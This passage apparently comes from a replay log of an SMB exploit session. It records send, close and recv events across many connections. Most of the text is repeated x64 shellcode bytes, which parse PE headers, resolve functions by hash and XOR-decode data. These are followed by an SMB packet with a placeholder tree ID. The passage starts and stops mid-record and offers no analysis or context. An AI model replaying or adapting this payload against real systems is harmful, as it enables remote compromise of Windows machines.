\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 20, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 3, 9.967667061999236)\", \"('close', 4, 0.0)\", \"('close', 5, 0.0)\", \"('close', 6, 0.0)\", \"('close', 7, 0.0)\", \"('close', 8, 0.0)\", \"('close', 9, 0.0)\", \"('close', 10, 0.0)\", \"('close', 11, 0.0)\", \"('close', 12, 0.0)\", \"('close', 13, 0.0)\", \"('close', 14, 0.0)\", \"('close', 15, 0.0)\", \"('close', 17, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00#\\\\xffSMBq\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 18, 0.0)\", \"('close', 19, 0.0)\", \"('close', 20, 0.0)\", \"('close', 21, 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 1, 